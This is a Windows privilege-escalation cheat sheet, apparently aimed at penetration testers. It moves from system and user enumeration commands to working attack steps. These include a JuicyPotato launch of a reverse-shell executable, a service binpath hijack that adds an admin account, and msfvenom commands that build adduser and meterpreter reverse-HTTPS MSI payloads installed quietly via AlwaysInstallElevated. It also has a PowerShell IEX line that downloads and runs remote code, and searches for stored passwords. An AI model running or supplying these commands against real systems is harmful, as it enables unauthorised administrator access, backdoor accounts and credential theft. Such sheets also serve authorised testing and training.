Windows Privilege Escalation

A collection of goodies, one-liners, and to-dos to keep in your back pocket!

System

Check for goodies in environment variables

set

Get OS and architecture

systeminfo

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type"

View recent KBs installed

wmic qfe

wmic qfe get Caption,Description,HotFixID,InstalledOn

wmic qfe list full

Local storage

wmic logicaldisk get caption,description,providername

Get .NET Framework versions (winPEAS binary pre-req)

reg query "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\full" /v version

dir /b /ad /o-n %systemroot%\\[Microsoft.NET](<http://microsoft.net/>)\\Framework\\v?.*

• Enable RDP Access

Users

Get your user

whoami

Get your privileges

whoami /priv

Get your groups

whoami /groups

View other users

net user

net user <username>

View local groups

net localgroup (may not work without logon session, have to specify group)

net localgroup administrators

List scheduled tasks

schtasks /query /fo LIST /v

Network

Get IP addresses

ipconfig /all

Get ARP table

arp -a

Get route table

route print

See what ports are listening, who we are communicating wtih

netstat -ano

Passwords

Search current directory for certain files containing "password"

findstr /si password *.txt *.ini *.config

Search for files that contain password in filename

dir /s *password*

Firewall / AntiVirus

Check for firewall settings

netsh firewall show state

netsh firewall show config

Get antivirus

wmic /node:localhost /namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName

• Bypass Anti-Virus with Hyperion

Services

Check for running services

net start

wmic service list brief

Check for installed drivers

DRIVERQUERY

Link running processes to services

tasklist /SVC

Get permission string for all services

sc query state= all | findstr "SERVICE_NAME:" >> a & FOR /F "tokens=2 delims= " %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @sc sdshow %i & @echo ---------) & del a 2>nul & del b 2>nul

• Windows XP? You can probably exploit upnphost

Impersonation

whomai /privs

Have SeImpersonate or SeAssignPrimaryToken?

You must find a CLSID here: http://ohpe.it/juicy-potato/CLSID/

JuicyPotato.exe -l 1340 -p C:\\users\\User\\rev.exe -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

Unquoted Service Paths

Find unquoted binary paths in services

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\\Windows\\\\" |findstr /i /v """

Check permissions, can we write to the directory we want and start/stop service?

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

icacls [Directory]

sc stop [service] && sc start [service]

Edit binary path

sc config [service] binpath="malicious exe path

sc stop [service]

sc start [service]

If we don't want to redirect to a reverse shell exe we can make a new user instead

sc config [service] binpath="net user admin password /add"

AlwaysInstallElevated

Check if enabled

reg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated

Create msi payload

msfvenom -p windows/adduser USER=admin PASS=password -f msi -o filename.msi

msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai LHOST=[LHOST IP] LPORT=443 -f msi -o filename.msi

Install elevated payload

msiexec /quiet /qn /i C:\\Users\\filename.msi

Unattended Installs

Check for unattended install files. May contain base64 encoded passwords for local admin accounts.

C:\\Windows\\Panther\\
C:\\Windows\\Panther\\Unattend\\
C:\\Windows\\System32\\
C:\\Windows\\System32\\sysprep\\

Unattend.xml
unattended.xml
unattend.txt
sysprep.xml
sysprep.inf

PowerShell

Run something without ever touching the disk

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('<http://blah/blah.exe>'); Invoke-AllChecks"

Common Exploits

Here's a list of some common exploits leading to investigate when looking at privilege escalation.

Windows Vista/7 – Elevation of Privileges (UAC Bypass)

Microsoft Windows 7 SP1 (x86) – ‘WebDAV’ Privilege Escalation (MS16-016)

Microsoft Windows 7 SP1 (x86) – Privilege Escalation (MS16-014)

Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) – Privilege Escalation (MS16-032)

CVE-2017-0213: Windows COM Elevation of Privilege Vulnerability

• https://github.com/WindowsExploits/Exploits/tree/master/CVE-2017-0213
• https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213

CVE-2019-1253: Windows Elevation of Privilege Vulnerability

CVE-2019-0836: Microsoft Windows 10 1809